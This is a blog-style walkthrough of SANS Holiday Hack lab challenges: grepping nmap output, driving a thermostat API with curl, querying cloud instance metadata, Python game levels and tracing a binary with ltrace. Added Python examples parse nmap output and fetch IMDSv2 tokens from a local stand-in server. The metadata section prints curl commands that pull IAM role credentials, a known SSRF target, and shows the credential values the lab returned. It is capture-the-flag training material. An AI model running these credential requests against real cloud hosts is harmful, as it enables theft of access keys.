SANS Holiday Hack

Some of the Cranberry Pi terminals and challenges, all mixed in!

Grep Challenge:

Howdy howdy!  Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!

Answer all the questions in the quizme executable:
- What port does 34.76.1.22 have open?
- What port does 34.77.207.226 have open?
- How many hosts appear "Up" in the scan?
- How many hosts have a web port open?  (Let's just use TCP ports 80, 443, and 8080)
- How many hosts with status Up have no (detected) open TCP ports?
- What's the greatest number of TCP ports any one host has open?

Check out bigscan.gnmap and type quizme to answer each question.

output >

elf@1206be8c579e:~$ cat bigscan.gnmap |grep "34.76.1.22"
Host: 34.76.1.22 ()     Status: Up
Host: 34.76.1.22 ()     Ports: 62078/open/tcp//iphone-sync///      Ignored State: closed (999)
elf@1206be8c579e:~$ quizme
What port does 34.76.1.22 have open?
Please enter your answer or press h for a hint: 62078
That's correct!
We used this as a solution:
grep 34.76.1.22 bigscan.gnmap
This looks for "34.76.1.22" in the bigscan.gnmap file and shows us every place where it shows up.  In the results, we see:
  62078/open/tcp//iphone-sync///
This tells us port TCP 62078 was found open by nmap.
You have 5 challenges left.
elf@1206be8c579e:~$ 
elf@1206be8c579e:~$ cat bigscan.gnmap |grep "34.77.207.226"  
Host: 34.77.207.226 ()     Status: Up
Host: 34.77.207.226 ()     Ports: 8080/open/tcp//http-proxy///      Ignored State: filtered (999)
elf@1206be8c579e:~$ quizme
What port does 34.77.207.226 have open?
Please enter your answer or press h for a hint: 8080
That's correct!
We used this as a solution:
grep 34.77.207.226 bigscan.gnmap
Like the previous challenge, this searches the nmap output file for a specific IP address.  In the output, we see TCP port 8080 is open:
  8080/open/tcp//http-proxy///
You have 4 challenges left.
elf@1206be8c579e:~$ cat bigscan.gnmap |grep "Up"|wc -l     
26054
elf@1206be8c579e:~$ quizme
How many hosts appear "Up" in the scan?
Please enter your answer or press h for a hint: 26054
That's correct!
We used this as a solution:
grep Up bigscan.gnmap | wc -l
Running the grep part of the command returns every line with "Up" in it, and wc counts the bytes, characters, words, and lines that come out of grep. Using "-l" only shows lines.
You have 3 challenges left.
elf@1206be8c579e:~$ cat bigscan.gnmap |grep -E "(80|443|8080)/open"|wc -l
14372
elf@1206be8c579e:~$ quizme
How many hosts have a web port open?  (Let's just use TCP ports 80, 443, and 8080)
Please enter your answer or press h for a hint: 14372
That's correct!
We used this as a solution:
grep -E "(80|443|8080)/open" bigscan.gnmap | wc -l
Using "-E" tells grep we"re giving it a regular expression (regex).  In this case, that regex says, "I want lines that have 8080/open, 443/open, or 80/open."
  If you want to be MORE correct, you might use "(\s8080|\s443|\s80)/open" to ensure you don't snag ports like 50080, but there weren't any in this file.
You have 2 challenges left.
elf@1206be8c579e:~$ echo $((`grep -e "Up" bigscan.gnmap |wc -l` - `grep -e "/open/" bigscan.gnmap|wc -l`))
402
elf@1206be8c579e:~$ quizme
How many hosts with status Up have no (detected) open TCP ports?
Please enter your answer or press h for a hint: 402
That's correct!
We used this as a solution:
echo $((`grep Up bigscan.gnmap | wc -l` - `grep Ports bigscan.gnmap | wc -l`))
Our solution is a little fancy, but the crux is this: use one grep|wc command to count how many hosts are "Up", and use another to count how many have "Ports" open.
You have 1 challenge left.
elf@1206be8c579e:~$ cat bigscan.gnmap |grep -E "(open.*){12,}"|wc -l
5
elf@1206be8c579e:~$ cat bigscan.gnmap |grep -E "(open.*){13,}"|wc -l
0
elf@1206be8c579e:~$ quizme
What's the greatest number of TCP ports any one host has open?
Please enter your answer or press h for a hint: 12  
That's correct!
We used this as a solution:
grep -E "(open.*){12,}" bigscan.gnmap | wc -l && grep -E "(open.*){13,}" bigscan.gnmap | wc -l
In our solution, we count how many lines have "open" in them a number of times.  We get a few for 12 and none for 13.
One crafty tester employed the mighty powers of awk like this:
  awk 'BEGIN {print}{print gsub(/open/,"") ""}' bigscan.gnmap | sort -nr | head -1
You've done it!
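The six quizme questions are all one parsing problem: read the grepable nmap output host by host, keep the status and the set of open TCP ports per host, and ask the set questions afterwards. Below is an added example (not part of the challenge or its hint text) that does exactly that over a constructed sample in the same format; the sample deliberately includes a host with port 50080 open, so the substring pitfall the hint mentions is visible: the field-wise parser counts two web hosts, the transcript's `grep -E "(80|443|8080)/open"` counts three.

```python
import re

# Constructed sample in nmap -oG ("grepable") format; it is not the challenge's
# bigscan.gnmap. Host 10.0.7.12 carries port 50080 on purpose, to show the
# pitfall the quizme hint mentions (a bare "80/open" grep matches it).
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Wed Dec  1 07:02:24 2021 as: nmap -oG bigscan.gnmap 10.0.7.0/24
Host: 10.0.7.10 ()\tStatus: Up
Host: 10.0.7.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (997)
Host: 10.0.7.11 ()\tStatus: Up
Host: 10.0.7.11 ()\tPorts: 8080/open/tcp//http-proxy///\tIgnored State: filtered (999)
Host: 10.0.7.12 ()\tStatus: Up
Host: 10.0.7.12 ()\tPorts: 50080/open/tcp//unknown///, 53/open/udp//domain///\tIgnored State: closed (998)
Host: 10.0.7.13 ()\tStatus: Up
Host: 10.0.7.13 ()\tPorts: 62078/closed/tcp//iphone-sync///\tIgnored State: filtered (999)
Host: 10.0.7.14 ()\tStatus: Down
# Nmap done at Wed Dec  1 07:10:00 2021 -- 256 IP addresses (4 hosts up) scanned in 456.00 seconds
"""

WEB_PORTS = {80, 443, 8080}


def parse_gnmap(text):
    """Return {ip: {"status": str or None, "open_tcp": set of int}}.

    Every port entry is split on "/" into port/state/proto/..., so an entry
    such as 50080/open/tcp can never be counted as port 80.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        ip = line.split()[1]
        rec = hosts.setdefault(ip, {"status": None, "open_tcp": set()})
        if "Status: " in line:
            rec["status"] = line.split("Status: ", 1)[1].strip()
        if "Ports: " in line:
            ports_field = line.split("Ports: ", 1)[1].split("Ignored State:")[0]
            for entry in ports_field.split(", "):
                fields = entry.strip().split("/")
                if len(fields) < 3:
                    continue
                port, state, proto = fields[0], fields[1], fields[2]
                if state == "open" and proto == "tcp":
                    rec["open_tcp"].add(int(port))
    return hosts


def open_tcp_ports(hosts, ip):
    """Q1/Q2: which TCP ports a given host has open."""
    return sorted(hosts[ip]["open_tcp"]) if ip in hosts else []


def count_up(hosts):
    """Q3: hosts whose Status line says Up."""
    return sum(1 for h in hosts.values() if h["status"] == "Up")


def count_web_hosts(hosts):
    """Q4: hosts with at least one of 80, 443, 8080 open on TCP."""
    return sum(1 for h in hosts.values() if h["open_tcp"] & WEB_PORTS)


def count_up_without_open_tcp(hosts):
    """Q5: Up hosts with no open TCP port at all."""
    return sum(1 for h in hosts.values() if h["status"] == "Up" and not h["open_tcp"])


def max_open_tcp(hosts):
    """Q6: the largest number of open TCP ports on any single host."""
    return max((len(h["open_tcp"]) for h in hosts.values()), default=0)


def naive_web_count(text):
    """The transcript's grep -E "(80|443|8080)/open" | wc -l, for comparison."""
    return sum(1 for line in text.splitlines() if re.search(r"(80|443|8080)/open", line))


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    print("10.0.7.12 open TCP:", open_tcp_ports(hosts, "10.0.7.12"))
    print("up:", count_up(hosts), "web:", count_web_hosts(hosts),
          "naive web grep:", naive_web_count(SAMPLE_GNMAP),
          "up w/o open tcp:", count_up_without_open_tcp(hosts),
          "max open:", max_open_tcp(hosts))
```

Run it against the real file with `parse_gnmap(open("bigscan.gnmap").read())`; the UDP entry and the closed-port entry in the sample show why state and protocol are checked rather than just the word "open".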



Wifi Challenge

Turn up the heat to defrost the entrance to Frost Tower. Click on the Items tab in your badge to find a link to the Wifi Dongle’s CLI interface. Talk to Greasy Gopherguts outside the tower for tips

elf@a3968fa3d847:~$ iwlist wlan0 scanning
wlan0     Scan completed :
          Cell 01 - Address: 02:4A:46:68:69:21
                    Frequency:5.2 GHz (Channel 40)
                    Quality=48/70  Signal level=-62 dBm  
                    Encryption key:off
                    Bit Rates:400 Mb/s
                    ESSID:"FROST-Nidus-Setup"
elf@a3968fa3d847:~$ iwconfig wlan0 essid FROST-Nidus-Setup
** New network connection to Nidus Thermostat detected! Visit http://nidus-setup:8080/ to complete setup
(The setup is compatible with the 'curl' utility)
elf@a3968fa3d847:~$ curl http://nidus-setup:8080
◈──────────────────────────────────────────────────────────────────────────────◈

Nidus Thermostat Setup

◈──────────────────────────────────────────────────────────────────────────────◈

WARNING Your Nidus Thermostat is not currently configured! Access to this
device is restricted until you register your thermostat » /register. Once you
have completed registration, the device will be fully activated.

In the meantime, Due to North Pole Health and Safety regulations
42 N.P.H.S 2600(h)(0) - frostbite protection, you may adjust the temperature.

API

The API for your Nidus Thermostat is located at http://nidus-setup:8080/apidoc
elf@b5b1ec182993:~$ curl http://nidus-setup:8080/apidoc
◈──────────────────────────────────────────────────────────────────────────────◈

Nidus Thermostat API

◈──────────────────────────────────────────────────────────────────────────────◈

The API endpoints are accessed via:

http://nidus-setup:8080/api/<endpoint>

Utilize a GET request to query information; for example, you can check the
temperatures set on your cooler with:

curl -XGET http://nidus-setup:8080/api/cooler

Utilize a POST request with a JSON payload to configuration information; for
example, you can change the temperature on your cooler using:

curl -XPOST -H 'Content-Type: application/json' \
  --data-binary '{"temperature": 0}' \
  http://nidus-setup:8080/api/cooler


● WARNING: DO NOT SET THE TEMPERATURE ABOVE 0! That might melt important furniture

Available endpoints

┌─────────────────────────────┬────────────────────────────────┐
│ Path                        │ Available without registering? │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/cooler                 │ Yes                            │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/hot-ice-tank           │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/snow-shower            │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/melted-ice-maker       │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/frozen-cocoa-dispenser │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/toilet-seat-cooler     │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/server-room-warmer     │ No                             │ 
└─────────────────────────────┴────────────────────────────────┘
elf@b5b1ec182993:~$ curl -XPOST -H 'Content-Type: application/json' \
  --data-binary '{"temperature": 0}' \
  http://nidus-setup:8080/api/cooler
{
  "temperature": 0.98,
  "humidity": 87.26,
  "wind": 6.27,
  "windchill": -1.0,
  "WARNING": "ICE MELT DETECTED!"
}

elf@b5b1ec182993:~$ 



Challenge: IMDS

This Pi challenge was neat for the SSRF challenge… it taught the basic commands.

elfu@7d794547eef9:~$ ping 169.254.169.254
PING 169.254.169.254 (169.254.169.254) 56(84) bytes of data.
64 bytes from 169.254.169.254: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 169.254.169.254: icmp_seq=2 ttl=64 time=0.022 ms
64 bytes from 169.254.169.254: icmp_seq=3 ttl=64 time=0.040 ms
^C
--- 169.254.169.254 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2028ms
rtt min/avg/max/mdev = 0.019/0.027/0.040/0.009 ms
elfu@7d794547eef9:~$ next
elfu@7d794547eef9:~$ curl http://169.254.169.254
latest
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest
dynamic
meta-data
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document | q
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   451  100   451    0     0   440k      0 --:--:-- --:--:-- --:--:--  440k
{
  "accountId": "PCRVQVHN4S0L4V2TE",
  "imageId": "ami-0b69ea66ff7391e80",
  "availabilityZone": "np-north-1f",
  "ramdiskId": null,
  "kernelId": null,
  "devpayProductCodes": null,
  "marketplaceProductCodes": null,
  "version": "2017-09-30",
  "privateIp": "10.0.7.10",
  "billingProducts": null,
  "instanceId": "i-1234567890abcdef0",
  "pendingTime": "2021-12-01T07:02:24Z",
  "architecture": "x86_64",
  "instanceType": "m4.xlarge",
  "region": "np-north-1"
}
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data
.....<snip>
network/interfaces/macs/0e:49:61:0f:c3:11/ipv6s
network/interfaces/macs/0e:49:61:0f:c3:11/local-hostname
network/interfaces/macs/0e:49:61:0f:c3:11/local-ipv4s
network/interfaces/macs/0e:49:61:0f:c3:11/mac
network/interfaces/macs/0e:49:61:0f:c3:11/owner-id
network/interfaces/macs/0e:49:61:0f:c3:11/public-hostname
network/interfaces/macs/0e:49:61:0f:c3:11/public-ipv4s
network/interfaces/macs/0e:49:61:0f:c3:11/security-group-ids
network/interfaces/macs/0e:49:61:0f:c3:11/security-groups
network/interfaces/macs/0e:49:61:0f:c3:11/subnet-id
network/interfaces/macs/0e:49:61:0f:c3:11/subnet-ipv4-cidr-block
network/interfaces/macs/0e:49:61:0f:c3:11/subnet-ipv6-cidr-blocks
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-id
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-ipv4-cidr-block
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-ipv4-cidr-blocks
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-ipv6-cidr-blocks
placement/availability-zone
placement/availability-zone-id
placement/group-name
placement/host-id
placement/partition-number
placement/region
product-codes
public-hostname
public-ipv4
public-keys/0/openssh-key
reservation-id
security-groups
services/domain
services/partition
spot/instance-action
spot/termination-time
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data/public-hostname
ec2-192-0-2-54.compute-1.amazonaws.comelfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data/public-hostname; echo
ec2-192-0-2-54.compute-1.amazonaws.com
elfu@7d794547eef9:~$ 
elfu@55e39f6fa4da:~$ curl http://169.254.169.254/latest/meta-data/iam/securityoelfu-deploy-role 
elfu@55e39f6fa4da:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role
{
        "Code": "Success",
        "LastUpdated": "2021-12-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
        "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
        "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
        "Expiration": "2026-12-02T18:50:40Z"
}
elfu@55e39f6fa4da:~$ cat gettoken.sh 
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
elfu@55e39f6fa4da:~$ source gettoken.sh 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    44  100    44    0     0  44000      0 --:--:-- --:--:-- --:--:-- 44000
elfu@55e39f6fa4da:~$ echo $TOKEN
Uv38ByGCZU8WP18PmmIdcpVmx00QA3xNe7sEB9Hixkk=
elfu@55e39f6fa4da:~$ curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/placement/region
🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬
You've completed the lesson on Instance Metadata interaction. Run 'exit' to close.
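The difference between the two halves of that transcript is the whole IMDSv2 story: the early requests are plain GETs that any SSRF can issue, while gettoken.sh first does a PUT with a TTL header and only then presents the token. The added example below (my code, not the challenge's) performs that two-step exchange with urllib and, so that it runs offline, talks to a constructed stand-in for the metadata service that behaves as IMDSv2-only; the role name is borrowed from the transcript for readability but the credentials it returns are invented.

```python
import json
import secrets
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the instance metadata service so the client code
# runs offline. The role name matches the transcript; the values are made up.
ROLE = "elfu-deploy-role"
FAKE_CREDS = {
    "Code": "Success",
    "Type": "AWS-HMAC",
    "AccessKeyId": "AKIAEXAMPLEEXAMPLE",
    "SecretAccessKey": "example-secret-not-real",
    "Token": "example-session-token",
    "Expiration": "2021-12-03T00:00:00Z",
}


class FakeIMDS(BaseHTTPRequestHandler):
    """IMDSv2-only behaviour: every GET needs a token minted by a prior PUT."""
    tokens = set()

    def log_message(self, *_):  # keep the demo quiet
        pass

    def _reply(self, code, body=""):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        ttl = self.headers.get("X-aws-ec2-metadata-token-ttl-seconds")
        if self.path == "/latest/api/token" and ttl and ttl.isdigit():
            token = secrets.token_urlsafe(32)
            FakeIMDS.tokens.add(token)
            self._reply(200, token)
        else:
            self._reply(400)

    def do_GET(self):
        if self.headers.get("X-aws-ec2-metadata-token") not in FakeIMDS.tokens:
            self._reply(401)  # the v1-style request most SSRF primitives can make
            return
        if self.path == f"/latest/meta-data/iam/security-credentials/{ROLE}":
            self._reply(200, json.dumps(FAKE_CREDS))
        elif self.path == "/latest/meta-data/iam/security-credentials/":
            self._reply(200, ROLE)
        else:
            self._reply(404)


def imds_request(base, path, method="GET", headers=None, timeout=2):
    """Return (status, body) for one metadata request; HTTP errors are returned, not raised."""
    req = urllib.request.Request(base + path, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def get_v2_token(base, ttl_seconds=21600):
    """Step 1 of IMDSv2: a PUT carrying the TTL header. The PUT is what stops most SSRF."""
    status, body = imds_request(base, "/latest/api/token", "PUT",
                                {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)})
    return body if status == 200 else None


def get_role_credentials(base, role):
    """Step 2: present the token on the GET for the role's temporary credentials."""
    token = get_v2_token(base)
    if token is None:
        return None
    status, body = imds_request(base, f"/latest/meta-data/iam/security-credentials/{role}",
                                headers={"X-aws-ec2-metadata-token": token})
    return json.loads(body) if status == 200 else None


def run_demo():
    """Start the stand-in on localhost, try v1-style then v2-style access, return both results."""
    server = HTTPServer(("127.0.0.1", 0), FakeIMDS)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_port}"
    try:
        v1_status, _ = imds_request(base, f"/latest/meta-data/iam/security-credentials/{ROLE}")
        creds = get_role_credentials(base, ROLE)
    finally:
        server.shutdown()
        server.server_close()
    return v1_status, creds


if __name__ == "__main__":
    print(run_demo())
```

Against a real instance, point `base` at `http://169.254.169.254`; the same code works for IMDSv1 hosts too, since they accept the token header and simply ignore it.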

Challenge: Elf game

I really enjoyed this challenge; it was fun.

level 2
import elf, munchkins, levers, lollipops, yeeters, pits
# Gets all lollipops as a list
all_lollipops = lollipops.get()
# Can set lollipop1 using:
lollipop1 = all_lollipops[1]
lollipop0 = lollipops.get(0)
elf.moveTo(lollipop1.position)
elf.moveTo(lollipop0.position)
elf.moveLeft(3)
elf.moveUp(99)

level 3
Objective
Move the elf to collect the lollipops and get to the KringleCon entrance.

Hint
You can walk past the Yeeter once you complete lever0's task and call lever0.pull(modified_data) in the desired way to disable the Yeeter trap.
Click on the lever 0 object in the CURRENT LEVEL OBJECTS panel for more information.
import elf, munchkins, levers, lollipops, yeeters, pits
lever0 = levers.get(0)
answer = lever0.data() + 2
lollipop0 = lollipops.get(0)
elf.moveTo(lever0.position)
lever0.pull(answer)
elf.moveTo(lollipop0.position)
elf.moveUp(99)

level 4
import elf, munchkins, levers, lollipops, yeeters, pits
# Complete the code below:
lever0, lever1, lever2, lever3, lever4 = levers.get()
# Move onto lever4
elf.moveLeft(2)
# This lever wants a str object:
lever4.pull("A String")
# Need more code below:
elf.moveTo(lever3.position)
lever3.pull(True)
elf.moveTo(lever2.position)
lever2.pull(1.5)
elf.moveTo(lever1.position)
lever1.pull([1,2,3])
elf.moveTo(lever0.position)
lever0.pull({"good":"times"})
elf.moveUp(99)

level 5

import elf, munchkins, levers, lollipops, yeeters, pits
# Fix/Complete Code below
lever0, lever1, lever2, lever3, lever4 = levers.get()
elf.moveTo(lever4.position)
string = lever4.data() + " concatenate"
lever4.pull(string)
elf.moveTo(lever3.position)
boolval = not lever3.data()
lever3.pull(boolval)
elf.moveTo(lever2.position)
adding = lever2.data() + 1
lever2.pull(adding)
elf.moveTo(lever1.position)
thelist = lever1.data()
thelist.append(1)
lever1.pull(thelist)
elf.moveTo(lever0.position)
thedict = lever0.data()
thedict["strkey"] = "strvalue"
lever0.pull(thedict)
elf.moveUp(99)

level 6
Objective
Move the elf to the lever. Get the lever data lever.data() and perform the appropriate action to the data. Submit the modified data using lever.pull(modified_data).

Hints
This level requires the use of operators to compare and modify data. This link on operators should help.

Data types will also need to be checked using conditionals in if, elif, else statements. This link on conditionals should help.

You will also need to use conditionals to check data types. This link on types should help.

For example, if you want to check the type of a variable, you could use:

if type(var) == str:
    print("Its a string!")

 Objective

Calling lever.data() will return a boolean, a number, a list of integers, a string, or a dict with "a" and an integer to you. For a boolean, return the inverse. For a number, return double the number. For a list of integers, return that list with each integer incremented by 1. For a string, return the string concatenated with itself. For a dict, return the dict with a's value + 1. Submit this response using lever.pull(conditional_answer) .

Note

If you submit a correct answer to lever.pull(answer), then the lever and its corresponding trap will be disabled.

In order to run lever.pull(answer) with lever (#0), you must be standing in its grid square located at (x:2,y:4).

This particular lever object can be saved to a variable named lever using lever = levers.get(0)   

import elf, munchkins, levers, lollipops, yeeters, pits
# Fix/Complete the below code
lever = levers.get(0)
data = lever.data()
if type(data) == bool:
    data = not data
elif type(data) == int:
    data = data * 2 
elif type(data) == str:
    data = data + data
elif type(data) == list:
    data = [x + 1 for x in data]
elif type(data) == dict:
    data["a"] += 1    
    
elf.moveTo(lever.position)
lever.pull(data)
elf.moveUp(99)
#lever.something

level 7
Objective
Navigate through the obstacles and collect the lollipop before arriving at the KringleCon entrance.

Hints
Using a for loop can reduce how many lines and/or object function calls are used. This link on for loops may be helpful.

Using elf.moveLeft(40) will move your elf as far as possible before hitting an obstacle or the end of the screen. Use however large a number you think you need!

import elf, munchkins, levers, lollipops, yeeters, pits
for num in range(5): #not sure if number is right
    elf.moveLeft(3)
    elf.moveUp(11)
    elf.moveLeft(3)
    elf.moveDown(11)

level 8
import elf, munchkins, levers, lollipops, yeeters, pits
all_lollipops = lollipops.get()
for lollipop in all_lollipops:
    elf.moveTo(lollipop.position)
lever = levers.get(0)
data = lever.data()
elf.moveTo(lever.position)
data.insert(0,"munchkins rule")
lever.pull(data)
elf.moveDown(3)
elf.moveLeft(6)
elf.moveUp(99)

Challenge: Kotton Kandy Co

Fix the registration.json

================================================================================

Please, we need your help! The cotton candy machine is broken!

We replaced the SD card in the Cranberry Pi that controls it and reinstalled the
software. Now it's complaining that it can't find a registration file!

Perhaps you could figure out what the cotton candy software is looking for...

================================================================================

So I brute-forced my way to victory.

kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0
puts("Unable to open configuration fil"...Unable to open configuration file.
)               = 35
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ touch registration.json
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x560aaa75d260
getline(0x7ffdb8b6e560, 0x7ffdb8b6e568, 0x560aaa75d260, 0x7ffdb8b6e568) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ strace ./make_the_candy 
execve("./make_the_candy", ["./make_the_candy"], 0x7ffe6dfd97c0 /* 12 vars */) = 0
brk(NULL)                               = 0x55d9d8831000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=19540, ...}) = 0
mmap(NULL, 19540, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff21617b000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\35\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030928, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff216179000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff215b66000
mprotect(0x7ff215d4d000, 2097152, PROT_NONE) = 0
mmap(0x7ff215f4d000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff215f4d000
mmap(0x7ff215f53000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff215f53000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7ff21617a4c0) = 0
mprotect(0x7ff215f4d000, 16384, PROT_READ) = 0
mprotect(0x55d9d6ff0000, 4096, PROT_READ) = 0
mprotect(0x7ff216180000, 4096, PROT_READ) = 0
munmap(0x7ff21617b000, 19540)           = 0
brk(NULL)                               = 0x55d9d8831000
brk(0x55d9d8852000)                     = 0x55d9d8852000
openat(AT_FDCWD, "registration.json", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
read(3, "", 4096)                       = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
write(1, "Unregistered - Exiting.\n", 24Unregistered - Exiting.
) = 24
exit_group(1)                           = ?
+++ exited with 1 +++
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x55a65b2c1260
getline(0x7fff4cb38f00, 0x7fff4cb38f08, 0x55a65b2c1260, 0x7fff4cb38f08) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x55d5cb1ae260
getline(0x7fff310b6850, 0x7fff310b6858, 0x55d5cb1ae260, 0x7fff310b6858) = 11
strstr("registered\n", "Registration")                    = nil
getline(0x7fff310b6850, 0x7fff310b6858, 0x55d5cb1ae260, 0x7fff310b6858) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x562f3ed62260
getline(0x7ffff7508130, 0x7ffff7508138, 0x562f3ed62260, 0x7ffff7508138) = 13
strstr("Registration\n", "Registration")                  = "Registration\n"
strchr("Registration\n", ':')                             = nil
getline(0x7ffff7508130, 0x7ffff7508138, 0x562f3ed62260, 0x7ffff7508138) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x55a8cd2b2260
getline(0x7ffe1b8c0970, 0x7ffe1b8c0978, 0x55a8cd2b2260, 0x7ffe1b8c0978) = 16
strstr(""Registration":\n", "Registration")               = "Registration":\n"
strchr("Registration":\n", ':')                           = ":\n"
strstr(":\n", "True")                                     = nil
getline(0x7ffe1b8c0970, 0x7ffe1b8c0978, 0x55a8cd2b2260, 0x7ffe1b8c0978) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x556fdb0a6260
getline(0x7ffc581db7f0, 0x7ffc581db7f8, 0x556fdb0a6260, 0x7ffc581db7f8) = 22
strstr(""Registration" : True\n", "Registration")         = "Registration" : True\n"
strchr("Registration" : True\n", ':')                     = ": True\n"
strstr(": True\n", "True")                                = "True\n"
getline(0x7ffc581db7f0, 0x7ffc581db7f8, 0x556fdb0a6260, 0x7ffc581db7f8) = -1
system("/bin/initialize_cotton_candy_sys"...


Launching...

     *                              *
      *                            *
       *                          *
        *                        *
         *                      *
          *                    *
           *                  *
            *                *
             *              *
              *            *
               *          *
                *        *
                 *      *
                  *    *
                   *  *
                    **
                    **
                   *  *
                  *    *
                 *      *
                *        *
               *          *
              *            *
             *              *
            *                *
           *                  *
          *                    *
         *                      *
        *                        *
       *                          *
      *                            *
                    <snip>
     *                              *
     *                              *
     *                              *
     *                              *
      *                            *
       *                          *
        *                        *
         *                      *
          *                    *
           *                  *
            *                *
             *              *
              *            *
               *          *
                *        *
                 *      *
                  *    *
                   *  *
                    **
         Candy making in progress


 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                    = 0
fclose(0x556fdb0a6260)                                    = 0
+++ exited (status 0) +++
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
